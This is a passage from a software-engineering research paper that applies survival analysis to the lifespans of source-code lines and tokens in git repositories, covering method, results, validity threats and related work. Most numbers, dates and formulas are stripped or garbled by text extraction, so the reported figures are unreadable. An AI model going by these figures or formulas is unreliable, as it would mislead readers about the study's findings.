the more general concept of using a synthetic git repository to track arbitrary fine-grained elements (hata, mizuno & kikuno, ). the downloaded repositories amount to gb and the synthetic ones to gb. tracking changes between revisions in such a repository will show the addition and removal of individual tokens, rather than complete lines. all other workflow and tools can remain the same. we created tokenized versions of the selected repositories through two tools: a file tokenizer and a repository tokenizer. the repository tokenizer is a perl script that acts as a filter between a git fast-export and a git fast-import command. it reads the dump of the original repository generated by the git fast-export command, queueing file content blobs it encounters, while passing the remaining data unchanged to its output. when it reads a commit packet, it matches the file extensions of the committed files against previously encountered blobs. for any blob whose file extension matches the languages supported by the file tokenizer, the repository tokenizer invokes the file tokenizer to convert the file into tokens, dumping the tokenized results on its output as the corresponding blob. to tokenize the contents of each file, we used the tokenizer tool, which splits its input into tokens using simple look-ahead lexical analysis (spinellis, ). support for each language is provided through a separate lexical analyzer to cater for differences in operators, reserved words, commenting, and string delimiters. through command-line options we directed the file tokenizer to split its input into a token per line replacing the spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ content of strings and comments with an ellipsis (…), thus also allowing us to ignore non-code changes. analysis of moved lines given that the file differencing program we employed will not report line moves within the same file, we attempted to quantify the effect of this behavior on our results. for this, we developed a tool that uses heckel’s linear time differencing algorithm (heckel, ), which does attempt to locate line moves. although the output of this program is not suitable for running the fully fledged analysis, its summary of added and removed lines can be tallied against that of the git diff program to compare their performance in detecting lines that have not changed. by configuring git diff to run the alternative program between all successive revisions, we found that heckel’s algorithm, despite taking into account line moves, reports . % more line additions and deletions than git’s stock algorithm. while differencing algorithms can always be tweaked to handle elaborate special cases, this result indicates that the differencing program we employed for the study works pretty hard to identify a competitively small set of differences, and that taking into account line moves using heckel’s algorithm would reduce the accuracy of our results by failing to track about % more lines. effect of the histogram algorithm following the recommendation of a recent systematic survey of studies that use diff (nugroho, hata & matsumoto, ), we also examined whether the use of git’s histogram difference algorithm would substantially alter our results. using a process similar to that described in the “analysis of moved lines”, we measured the differences in the reported added and deleted lines between the myers and the histogram algorithms. both differences were below . %: . % for deletions and − . % for additions. the effect’s small size is not surprising, because the histogram algorithm mainly improves the readability of the provided patch. statistical analysis if we had the time of birth and the time of death for each line of code and token in a project we could estimate the median lifespan of the line or token directly, by calculating lifespans and finding their median value. we are interested in the median and not the mean, because lifetimes may be skewed, so the mean, or average, would not give a representative metric. unfortunately, we do not have the lifespans of all lines and tokens that we have tracked in the repositories we have examined. we do have their birth timestamps, but there are many lines and tokens that are still alive at the end of our follow-up period: these are the lines and the tokens that are part of the code base of a project at the last time we check. their lifespans are right censored; they extend to the future. across projects, the mean of the percentage of right censored lines is . % and the median is . %; for tokens, the corresponding values are . % and . % respectively. spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to estimate the median lifespan under such circumstances we use the kaplan–meier or product-limit survival estimate (kaplan & meier, ). if our measurements take place at times t < t < … < tn and at time ti we have ni that are alive, of which di die right at that moment, then the probability of being alive at time ti is given by: sðtiÞ ¼ sðti� Þ ni � di ni � � the recursive definition assumes t < t and s(t ) = . in our data, lines and tokens are born at different times during a project. since we are interested in their lifespans and not at the chronological times of birth and death, we work only with the differences between birth and death timestamps. that means that the times ti are time offsets; time is the birth time for all lines. for example, if we have a line with a lifespan from ti to tj we take for its death time the difference tj − ti. for the lines and the tokens that are right censored, we assign as their death timestamp the latest timestamp in the project. we also flag them as being alive, which means that in the kaplan–meier estimation their lifespan will be taken to be at least until the latest project timestamp. note that we do not have censoring due to other causes, for example, a line being “lost” somewhere in the project’s timeline, without being able to follow it up. the function s(t) is stepwise, with constant values between the different ti. it estimates the survival function of a data set, which is formally defined as follows: s(t) is the probability that an individual (line of code in our case) survives longer than a time t: sðtÞ ¼ pðt > tÞ in the above, t is a variable indicating the time of death. we would also like to know what is the risk of dying at t. for this, we have to turn to the hazard function, or hazard rate, h(t), which is the rate at which an individual that has made it to time t will die within an interval δ t that tends to zero: hðtÞ ¼ lim dt! pðt � t < dtjt � tÞ dt we have three alternative hypotheses regarding the hazard function: � individuals run the same, constant, risk of death at each time t. � individuals run a higher risk of death when they are young; these are populations whose demographics are characterized by high infant mortality. � individuals run a higher risk of death when they are old; these are populations whose frailty increases with age (senescence). to test these hypotheses we will check whether the hazard function for lines of code follows a weibull distribution, a standard parametric model in survival analysis that has spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ been used widely in science and engineering (padgett, ). the weibull distribution specifies the following hazard rate, with two parameters l > , a > hðt; �; aÞ ¼ a�ta� the corresponding survival function is: sðt; �; aÞ ¼ e��ta the parameter a is called the shape parameter and the parameter l is called the scale parameter. together they determine the form of the corresponding weibull probability density function f ðt; �; aÞ ¼ a�ta� e��ta. the parameter l stretches or contracts the distribution along the x axis. there are three different cases for the parameter a: � if a < , the hazard rate decreases over time. � if a = , the hazard rate is constant. � if a > , the hazard rate increases with time. the three alternatives for α mirror the three hypotheses we want to check and can be the basis of the statistical analysis of the code aging process. results and discussion rq the kaplan–meier estimate provided the median lifespan for the projects we examined. this is the point in time at which % of the population has died. figure shows the kaplan–meier survival functions for all projects, in increasing order. the minimum line median lifespan, at . years (about . h), is for the project handbrake; the maximum line median lifespan, at . years, is for collectd, while for torque and boto the lifespan could not be calculated, because not enough lines had died by figure kaplan–meier median lifespan estimates. lifespan estimates per project, in increasing order, calculated for lines and for individual tokens. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the end of the data collection period to be able to get to the % point. we investigated the extremely low value for handbrake. it appears that the project features large commits and incorporates the entire mac sparkle framework within the repository. turning to tokens, the minimum median lifespan was for odoo at . years. there were four projects for which no median lifespan could be calculated: thrift, mpc-hc, boto, collectd, torque. the maximum median lifespan that could be calculated was for docuwiki, at . years. taking all line results together, the median of the median lifespans is at . years, while the % percentile is at . years and the % percentile is at . years. for tokens, the corresponding median is . years, the % percentile . years, and the % percentile . years. these results indicate that lines and their individual tokens are durable rather than perishable, with lifespans measured in years rather than days. figure shows the histograms of the median lifespans. the growth of projects is punctuated with bursts of additions and deletes; these occur when a large body of code is imported or removed en masse from the project. we examined whether the estimates would change if we remove outliers. we therefore carried out the same statistics after removing the lines and tokens that where introduced in commits that were in the top % of commit size in every project. the line median lifespan moved to . years, an increase of . %; the token median lifespan moved to . years, an increase of . %. that is not trivial, but it does not change the overall picture. to determine whether the differences in the medians between the line-oriented and the tokenized data can be explained away by chance, we carried out a wilcoxon signed- rank test. the null hypothesis was that the two median populations come from the same distribution. the test allowed us to reject the null hypothesis with high probability (p-value close to zero). it follows that code tokens lead longer lives than code lines; figure histogram of median lifespans. distributions of median lifespans of lines and individual tokens. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ after all, every token that changes affects the line in which it belongs, but the opposite does not hold. as project lifespans vary, the variability of code lifespans may be explained by the variability of project lifespans: code in longer-lived projects may live longer than code in younger projects. to investigate that, we performed correlation tests between median line lifespans and project lifespans. the spearman correlation test for lines produced ρ = . (p < . ), which indicates a slight monotonically increasing relationship between median life lifespan and project lifespan. the pearson correlation test produced r = . (p ≪ . ); the difference with the spearman result can be explained if the relationship is monotonically increasing, but not linear. for tokenized data, the correlation was a bit stronger, with spearman ρ = . (p ≪ . ) and pearson r = . (p ≪ . ). figure shows a scatterplot of line and tokens median lifespans with a regression line; the regression coefficient for lines is . and for tokens is . . in all, although the effect of project age is statistically significant, its effect on the longevity of code is small. rq moving beyond the estimates of median line lifespan, we checked the three hypotheses on hazard rates by fitting a weibull distribution to each project’s data. the fit was performed on the full line data of each project; we are interested in the fitted weibull a parameter that controls the shape of the distribution and therefore the evolution of the hazard rate. the results of the fit showed that for all projects the a parameter is less than one, indicating a process with high infant mortality. figure shows the weibull fitted distributions for all projects, each line being a project. the median of a is . , while the % percentile is . and the % percentile . . the situation is almost the same if we do the same analysis for tokens. two projects have a � (by a whisker, ojs with a = . and xmbc with a = . ). the median is . , the % percentile . and the % percentile . . project lifespan (years) lines m e d ia n li fe sp a n ( ye a rs ) figure line median lifespan on project lifespan. scatterplots and regression lines of the lifespan of each project vs the median lifespan. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from the above, it follows that young lines run higher risks. old lines die as well, but younger ones at higher rates. this suggests a software development process where lines that are introduced into the code base of the project are subject to more change pressures. a line that has just been committed may not have been as thoroughly tested as older lines; it may need to be modified to accommodate factors that had not been foreseen; lines just added may impact more those recently introduced than parts of the older code base. conversely, old lines seem to have proved their mettle. they have survived a long time and they are less likely to suffer changes than young lines. in a more negative light, old lines may gain a “don’t touch” status, where developers are wary to change anything that works, which therefore lives on. whichever may hold, that a line lives on because it is really valuable or because nobody dares to change it, developers should be aware that they work for the long term. a line of code may live for years, well beyond the developers’ involvement with a project or their ability to remember the rationale behind a cryptic choice. consequently, our findings provide one more reason for writing clear and well-documented code. our findings also support the need to manage and perform what have been called anti-regressive changes (lehman, ) to the software (effort required to combat the growth in complexity) in order to avoid the accumulation of technical debt (kruchten, nord & ozkaya, ). code lines that live long are likely to become out of sync with respect to the software’s evolving architecture, design, apis, third-party libraries, language standards, as well as coding conventions and practices. as we have shown, such lines are not very likely to go away. consequently, it is required to find those code lines that need care and bring them up to scratch. this is typically accomplished through the detection of code smells and the corresponding refactoring of code (fowler, ). figure hazard rates of lines of code per project. for all projects, the hazard rate for lines decreases with time, i.e., older lines run a smaller risk of dying. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rq a we investigated whether particular features of lines are conducive to more changes. we ran a linear multiple regression model for each project with the lifespan of a line as the dependent variable and as independent variables the length of the line, the indentation, the number of strings in the line, whether it (or part of it) is a comment, the number of commas, the number of brackets, the number of access operators (method and pointer), the number of assignments, the number of scope delimiters, the number of array accesses, and the number of logical operators. the elements we tested point to code smells or other code features that may make the code less stable, affecting its lifetime. we selected the aforementioned features for the following reasons. a large number of brackets may indicate complicated conditions or expressions, or long statements, which are a known code smell (sharma, fragkoulis & spinellis, ). a large number of commas may indicate a long parameter list smell (mäntylä & lassenius, ). strings may indicate the entanglement of presentation elements with business logic (nguyen et al., ). the results showed a very low fit (r < . ) for all projects, apart from canu with r = . , handbrake, with r = . , and pyparallel, with r = . . the regression coefficients were found with very small p values, which indicates that the influence they have on the lifespan cannot be explained away by chance, but the whole linear model, and therefore each particular predictor in it, accounts for a tiny part of lifetime variance. rq b to conduct a similar analysis for tokens, we divided tokens in four types: identifiers ( million), numbers ( million), keywords ( million), and other tokens (mainly operators and punctuation— million). we ran pairwise mann–whitney u tests between the lifetimes of different token types for each project. the distributions of the lifetimes of token types per project are different in the vast majority of projects (ranging from the distributions of / projects for identifiers vs other tokens to the distributions of / projects for keywords vs numbers). however, when we take the medians of the lifetimes of different token types for all projects, their distributions are then all indistinguishable. as for lines, we could not determine that some particular types of tokens are associated with longer lifetimes across projects. rq c a different factor that may influence the lifespan of a line is the committer who enters, alters, or deletes a line. we examined possible correlations between the lifespan and the number of developer commits in the project and between the experience and the tenure of the developer in the project. for this, we looked at commits in the middle year of the examined period ( ), thus providing at least . years time to gather line and developer data and then another . for lines to disappear. we used the number of a developer’s project commits until each examined commit as a measure of a developer’s experience, and the difference in time between the developer’s first project commit and the examined one as a measure of the developer’s tenure in the project. we carried out both spearman and pearson correlation tests to examine the relationship between line lifetime and the spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experience and tenure of the developer who added the line. we could not identify a single rule across projects. in some projects, committer activity and tenure appear to be positive correlated with line lifespan, in other projects they appear to be negative correlated, and in most projects the correlation seems to be weak: the median is close to zero. the situation changes when we examine the lifetime of lines vs the experience and tenure of the author who removed them: we find that the lifetime is positively correlated with developer experience, that is, more experienced developers remove longer-lived lines. the median of the correlation of line lifetime and developer experience across projects is . (spearman) and . (pearson) for p < . ; for the correlation of line lifetime and developer tenure the medians are . (spearman) and . (pearson) for p < . . alternatively, the above can mean that it takes experienced developers to remove a long-lived line, bringing us back to the “don’t touch” status. the “don’t touch” status also hints at a different facet of the way lines are handled. could it be that lines are more likely to be changed or deleted by the same developer who entered them into a project in the first place, rather than by a different committer? we contrasted, for each project, the lifetimes of lines that are changed by the same developer against those that are changed by a different one. the two distributions are different (checking with the mann–whitney u test) for all projects except drush and grails-core. in most projects, the median lifetime of lines removed by the same author who entered them is less than the median lifetime of lines removed by a different author ( / ); and similarly for the means ( / ). in short, lines are more likely to be touched by their original author (see also fig. ). figure per project lifetime medians for same and different committers. full-size doi: . /peerj-cs. /fig- spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rq d we investigated whether project size affects the longevity of lines and tokens. we checked the number of lines and the number of tokens for all commits, using both pearson and spearman correlations. we found only slight positive correlations, r = . (p < . ),for the pearson correlation (but not the spearman) for both the number of lines and the number of tokens in a project. of course, the size of the project may be related to its age and indeed the results are concordant with our preceding investigation on code lifespans and project lifespans. rq e turning to programing languages, although we expected to find greater lifespans in languages with features that promote modularity, we did not detect that. table shows that median lifetime estimates over projects grouped by programing language (excluding a single project in c#). if anything, we see that, for instance, c exhibits greater lifespans than c++. however, note that none of the differences between programing languages was statistically significant at the . level using the mann–whitney u test. threats to validity internal validity thankfully, by basing our study on historical data, many threats that typically appear in evolving experiments, such as design contamination, experimental mortality, and maturation, can be ruled out. the main remaining threats are associated with confounding factors, noise in the data, commit granularity, file differencing, and statistical methods. an important consideration is that the independent variable we used in our study, a code line’s age, can encompass many other variables. specifically with the passage of time, the number of faults in a line will decrease as these are winnowed out (ozment & schechter, ), the developers’ familiarity will increase as they read it again and again, and the line’s afferent couplings may increase as other code may depend on its elements. another factor is noise in the data we used. although we were careful to include (through simple measures) in our study what has been termed engineered software projects (munaiah et al., ), we cannot exclude the possibility that the underlying commit data contain infelicities that may influence our results. these include the addition or removal of large third-party software systems, wrongly set commit dates, history rewrites table languages and kaplan–meier (km) estimates. language # projects median median line km token km php . . c++ . . python . . java . . c . . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performed after the code was written, and errors introduced when one type of repository (e.g., cvs) gets converted into git. third-party code changes can have a significant effect on software evolution. gall et al. ( ) conducted an empirical study on a large telecommunication switching system, and identified important differences in the patterns of software evolution over time of the whole system vs its subsystems. a similar strategy of separately examining the growth of subsystems of large software projects has been followed by gonzález-barahona et al. ( ) and by gonzález-barahona et al. ( ). other studies of software evolution have also identified the ripples caused by the inclusion or removal of third-party components (robles, gonzález-barahona & herraiz, ), and some, such as the one by hatton, spinellis & van genuchten ( ), have attempted to address the issue by filtering them out. as we have not performed such filtering, these changes may affect our reported results. on the other hand, filtering introduces another threat to validity due to the subjective nature of the required decisions or parameters. a related factor is the granularity of the studied commits. our study is missing many intermediary commits, first because we removed about % through history simplification, and second because many others may have occurred in third-party repositories and then pushed upstream as a single commit (german, adams & hassan, ). one could argue that the effects of history simplification should cancel out: lines would on average appear later and also disappear later. nevertheless, to quantify the effect of history simplification, we measured the interval between commits in both the complete tree and the simplified longest path. as expected, the longer time paths upstream from merges in the complete tree, which were simplified away in the linear path, gave the tree a longer interval between commits (a median of min) than its longest path ( min). however, the difference between the median value of the two intervals ( min) is five orders of magnitude smaller than the line lifespan we report, making any effect negligible. the use of git to list the differences between two file versions is also a threat. first, the employed file difference algorithm (myers, ) will display a movement of code as a deletion and an insertion. then, relatively minor changes, such as the renaming of an identifier, will appear as line deletions and insertions, which may skew the results toward higher infant mortality. we examined the effect of these two issues through methods described in the sections on the analysis of individual tokens and moved lines. also, the detection of file renaming and copying is based on a heuristic and a threshold. we used the default thresholds, only increasing the number of files that would be checked for copies; there may conceivably be better values to use. a related issue is that our investigation focuses on individual code lines. we do not take context into account. a line that is moved from one place to the next impacts both places and may cause cascading changes in the lifespans of other lines. however, the same applies in traditional survival analysis: deaths may be related to other deaths (e.g., via disease); we are interested in the lifespan of lines, no matter the relationships that may exist between them. spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ given that we used custom-developed tools to track the birth and death of lines of code, human error is an inevitable factor. we tried to minimize this through numerous test cases, manual verification, and the use of internal consistency checks. turning to our statistical methods, we have used two statistical techniques to answer two different, but related questions. we used the kaplan–meier estimator to investigate the median lifespan of code in projects, and a weibull process to investigate the overall aging process. the kaplan–meier estimator provided us with approximations of the survival functions, while the weibull fit gave us approximations of the hazard functions. we assumed that the hazard rate is characterized by a weibull function, because the weibull distribution is a popular model for several related process such as component failure rates and weibull covers different aging processes depending on the value of a. moreover, we are not interested in the exact values of the parameters of the weibull distribution, but in the relation of a to , where we found consistent results. the remarkable agreement in the shape of the weibull distributions among many diverse projects (fig. ) leads us to believe that our findings are reproducible and generalizable. we examined whether the lognormal distribution, which is also often used in failure models, would be a better fit for our data. to compare the two models, weibull and lognormal, we used the akaike information criterion (aic), defined as aic ¼ k � logðl̂Þ, where k is the number of parameters of the model and l̂ is the maximum likelihood of the model. a lower aic value corresponds to a better fit, as this maximizes the goodness of fit, given by the log-likelihood, but penalizes the complexity of the model, given by the number of parameters. we found overwhelmingly that the weibull distribution was a better fit. only five projects had better fit with the lognormal distribution when we examined the lines, and six projects had better fit with the lognormal distribution when we examined the tokens (four projects were the same). we used the python lifelines package for calculating the estimates and comparing the distributions (davidson-pilon et al., ). external validity the generalizability of our findings is threatened by our choice of analyzed projects. although we included projects from diverse development communities, written in numerous programing languages, and serving many different application areas, we cannot claim that our choice represents adequately all software development. in particular, we feel that our sample excludes or underrepresents the following software types: small software projects, projects developed with tightly managed or formal processes, proprietary and bespoke systems, projects written in programing languages not favored by the open source community, and systems that target specific application domains rather than the provision of systems infrastructure. more importantly, our findings are based on large, successful projects that have run for several years. there are many more projects that are discontinued after a short period of time, for any reason. all lines of code in these projects freeze at an early stage of what could have been a longer period of evolution. therefore our findings cannot be generalized to all software development—this would be an instance of survival bias, spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reaching conclusions for all the population based only on the characteristics of the survivors. that said, people usually aspire to create successful, long-lasting projects, so our findings are pertinent for those projects that want to achieve longevity. related work all living beings degenerate and die with age. the origin of senescence, however, remains an unsolved problem for biologists (kirkwood & austad, ). likewise, many software components evolve, age, and are eventually removed or replaced. this section presents related work regarding the fields of software evolution, aging, and decay, and records empirical studies that use the statistical method of survival analysis (elandt-johnson & johnson, ; klein & moeschberger, ). the process of software evolution refers to the modification and adaptation of software programs so that programs can survive as their environment changes. the software evolution laws of lehman ( ) describe the constraints practitioners should take into account to continuously adapt actively used software systems. a detailed literature review regarding lehman’s software evolution laws has been conducted by herraiz et al. ( ). many empirical studies focus on predictive models of software projects’ evolution at macroscopic scale. relevant studies have looked at long-term sustainability factors in the evolution of libreoffice (gamalielsson & lundell, ), the change of program dependencies in the apache ecosystem (bavota et al., ), and the early identification of source code evolution pattern in open source projects (karus, ). additionally, many empirical studies examine software evolution at the microscopic level, considering the evolution of source-code elements such as methods. in particular, bevan et al. ( ) developed kenyon, which supports different types of stratigraphic software evolution research, ranging from code feature evolution to dependency graph-based maintenance. zimmermann ( ) presented apfel for fine-grained processing of source code elements such as tokens, method calls, exceptions, and variable usages. hata, mizuno & kikuno ( ) introduced historage, which provides entire histories of fine-grained entities in java, such as methods, constructors, and fields. this tool has been applied to quantitatively evaluate the remaining change identification of open source software projects. the term software aging was coined by parnas ( ) and refers to the idea that programs, like people, are getting old. according to parnas, software aging happens for two reasons: ( ) software fails to adapt to changing needs, and ( ) software changes but in an inappropriate way (addition of bad fixes and features). given, however, that it is infeasible for developers to prevent software evolution and, consequently, software degradation, researchers attempt to limit program damages by predicting the software’s lifetime and inventing rejuvenation approaches (karus & dumas, ; li et al., ; qin et al., ; robillard & murphy, ; salfner, lenk & malek, ). in the field of software aging, empirical studies have been conducted on the identification of aging trends. in particular, robles et al. ( ) found that a system becomes “old” when it turns five. the authors also defined the absolute -year aging index to compare the relative aging of different projects. finally, cotroneo, natella & pietrantuono ( ) developed an approach that predicts the location of aging-related bugs using software complexity spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ metrics and machine learning algorithms. they found that the most significant signs of software aging manifest themselves as: leaked memory, unterminated threads, unreleased files and locks, numerical errors, and disk fragmentation. as software evolves, developers should overcome software erosion by fighting software decay. a significant research body is also devoted to this field. eick et al. ( ) used the term code decay to describe the situation where evolving software increasingly hinders software maintenance. the authors, also, proposed measurements (code decay indices) as decay predictors. for their study, they statically analyzed millions of lines of a fifteen-year old telephone switching software system. similarly to our work, the authors tracked added and deleted source code lines. however, they did not use survival analysis and they examined a single project to find particular code decay factors. additionally, arisholm & sjøberg ( ) proposed a framework for the empirical assessment of changeability decay and araújo, monteiro & travassos ( ) built a software decay model regarding software deterioration causes. extensive work has been done on identifying and tracking code changes. kim & notkin ( ) were the first that defined the problem of matching code elements between two program versions based on syntactic and textual similarity. to compute the difference between two programs several tools have been implemented. canfora, cerulo & penta ( ) developed a technique that combines space vector models and the levenshtein edit distance for finding cvs/svn differences that occur due to line additions or deletions, as well as due to line modifications. furthermore, the lhdiff tool implements language- independent techniques to track how source code lines evolve across different versions of a software system (asaduzzaman et al., b). the tool uses the simhash technique together with heuristics. in addition, the gumtree tool identifies edits in scripts when moving code in version repositories (falleri et al., ). this tool is based on a abstract syntax tree (ast) differencing algorithm. the changedistiller is another differencing tool that is based on a tree differencing algorithm for fine-grained source code change extraction (fluri et al., ). to represent how lines evolve over time in source code version repositories researchers have also used annotation graphs (zimmermann et al., ). more recently, servant & jones ( ) proposed a fine-grained model based on optimizing the levenshtein difference between lines of successive versions. finally, cvsscan is a visual tool for representing software evolution based on the tracking of line-based source code changes extracted by using unix’s diff (voinea, telea & van wijk, ). the lifetime tool we present here, balances computational cost with accuracy by processing a series of git diff outputs and uses a state machine for the parsing of their output. other researchers have also employed the tools of survival analysis in software (elandt-johnson & johnson, ; klein & moeschberger, ). sentas, angelis & stamelos ( ) developed a statistical framework based on survival analysis and the kaplan–meier estimator (kaplan & meier, ) to predict the duration of software projects and the factors that affect it. the authors applied their approach on proprietary software projects taking into account industrial factors that have an impact on a project’s lifetime. they found that the median duration of the examined projects is months. similarly, spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ samoladas, angelis & stamelos ( ) applied survival analysis on , open source projects to forecast software evolution trends. the authors observed that projects that existed more than ten years ago continue to evolve. comparably, our insights confirm that code in long-lived projects lives longer. scanniello ( ) used the kaplan–meier estimator on five software projects (at method level) to investigate how dead code affects software evolution. our finding regarding the lower hazard of older lines is mirrored by zheng et al. ( ) who report that in gentoo linux packages, a network graph new node is connected to an old node with a probability that depends not only on the degree but also on the age of the old node. other survival analysis studies include the one by claes et al. ( ) on the longevity of debian packages with conflicts and the one by goeminne & mens ( ) on the survival and influence of five java database frameworks. to the best of our knowledge, this article is the first work that uses survival analysis to track the birth and death of code lines and tokens over periods that span decades, and presents a theoretical and statistical model regarding the aging process of code lines. another research strand that the study of the evolution of fine-grained code elements is related to includes genetic improvement. genetic improvement (gi) uses automated search (i.e., optimization and machine learning techniques) in order to improve existing software. typically, gi involves making small changes or edits (also known as mutations) in source-code elements (i.e., lines of code or tokens) to improve existing software. topics covered by gi research include program transformation, approximate computing, and program repair (petke et al., ). as an example, petke et al. ( ) apply gi with automated code transplantation, by mutating the code at the level of lines of source code, to improve software performance. additionally, barr et al. ( ) introduced the plastic surgery hypothesis, which states that changes to a codebase refer to source code elements that already exist in the codebase at the time of a change. related work (nguyen et al., ; goues, forrest & weimer, ) considers repetitiveness of code changes (abstracted to abstract syntax trees) that is associated with the plastic surgery hypothesis. furthermore, martinez, weimer & monperrus ( ) consider changes that could be constructed based on existing code snippets. therefore, the study of the evolution of code elements, such as code lines or tokens that we take into account here, could help, in the future, in the guidance of software improvement based on evolutionary approaches. conclusions and implications when we began working on this study, we did not know whether code lines were durable or perishable and whether their demise was a result of infant mortality or senescence. by devising a method and implementing tools to follow source code lines from revision control repositories from their birth to their demise, we were able to arrive at the answers through the statistical analysis of . billion source code lifetime events. we found that code lines are durable with a median lifespan of about . years, the corresponding median for the tokens is . years, and that the associated hazard rate decreases over time following a weibull distribution; that is, young lines are more likely to spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ be modified or deleted. we investigated whether line and token longevity are associated with particular line and token features, developer experience and tenure in a project, and programing language. our results did not show strong patterns, indicating that line and token longevity may be the result of a complex interaction of various, potentially context specific, factors. project age and project size had a small correlation with code longevity. on the practical front, our model, suitably calibrated, can provide input for estimating maintenance effort, while the corresponding tool could aid the management of technical debt and the risk assessment of software vulnerabilities. our model derives statistical estimates of lifespan estimates and hazard rates, based on the source code of projects. they can be run on other projects, apart from the ones we used, to give the calibrated figures for them. knowing how lines and token age (or churn) in a project may help in managing technical debt and risk assessment (ozment & schechter, ; shin et al., ). for example, a large number of long-lived lines/tokens can be a sign of stability or “don’t touch” status. moreover, our regression model of lines lifespan vs project lifespan can be used against a particular project to gauge where it stands, or whether (perhaps problematically) it is an outlier. all these potential uses need to be empirically validated in future studies. on the research front, the study of code evolution at the level of individual lines can be extended both theoretically and in empirical breadth and depth. on the theoretical side, significant work is required to establish the precise mechanisms underlying the observed hazard rate. features we did not examine here, such as as the interplay of requirements, architecture, and syntax, might be worthy candidates for further study. corresponding theories should then be empirically evaluated using our methods and tools. on the breadth side examining more, and more diverse, repositories will strengthen the generalizability of our findings. tying together this area’s research and practical implications is the enticing quest to identify and control factors that do play a role in the lifetime of code elements. once these are nailed down, software engineering practices can be correspondingly adjusted so as to reduce potentially wasteful effort by delivering code lines with longer lifespans. this line of research can lead to a new promising and exciting avenue for improving the efficiency of software development. acknowledgements the authors thank alexander chatzigeorgiou for his valuable and timely feedback. this work’s first author thanks michiel van genuchten and les hatton for their fruitful collaboration on software growth modeling. additional information and declarations funding the project associated with this work has received funding from the european union’s horizon research and innovation program under grant agreement no. . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european union’s horizon: . competing interests the authors declare that they have no competing interests. author contributions � diomidis spinellis conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � panos louridas analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � maria kechagia analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and source code are available on zenodo: doi . /zenodo. . - spinellis, diomidis, louridas, panos, & kechagia, maria. ( ). evolution of software code at the level of fine-grained elements: data files (version . ) [data set]. zenodo. doi . /zenodo. . - kechagia, maria, louridas, panos, & kechagia, maria. ( , december ). evolution of software code at the level of fine-grained elements: source code. zenodo. doi . /zenodo. . references albrecht aj, gaffney je. . software function, source lines of code, and development effort prediction: a software science validation. ieee transactions on software engineering se- ( ): – doi . /tse. . . allamanis m, barr et, devanbu p, sutton c. . a survey of machine learning for big code and naturalness. acm computing surveys ( ): – doi . / . alon u, zilberstein m, levy o, yahav e. . code vec: learning distributed representations of code. proceedings of the acm on programming languages (popl): – doi . / . araújo map, monteiro vf, travassos gh. . towards a model to support in silico studies of software evolution. in: proceedings of the acm-ieee international symposium on empirical software engineering and measurement, esem ’ . – . arisholm e, sjøberg dik. . towards a framework for empirical assessment of changeability decay. journal of systems and software ( ): – doi . /s - ( ) - . asaduzzaman m, roy ck, schneider ka, di penta m. a. lhdiff: a language-independent hybrid approach for tracking source code lines. in: icsm : th ieee international conference on software maintenance. piscataway: ieee, – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ asaduzzaman m, roy ck, schneider ka, penta md. b. lhdiff: tracking source code lines to support software maintenance activities. in: ieee international conference on software maintenance. – . atkins dl, ball t, graves tl, mockus a. . using version control data to evaluate the impact of software tools: a case study of the version editor. ieee transactions on software engineering ( ): – doi . /tse. . . barnes jm, pandey a, garlan d. . automated planning for software architecture evolution. in: th ieee/acm international conference on automated software engineering (ase ’ ). – . barr et, brun y, devanbu p, harman m, sarro f. . the plastic surgery hypothesis. in: proceedings of the nd acm sigsoft international symposium on foundations of software engineering, fse . new york: association for computing machinery, – . bavota g, canfora g, penta md, oliveto r, panichella s. . the evolution of project 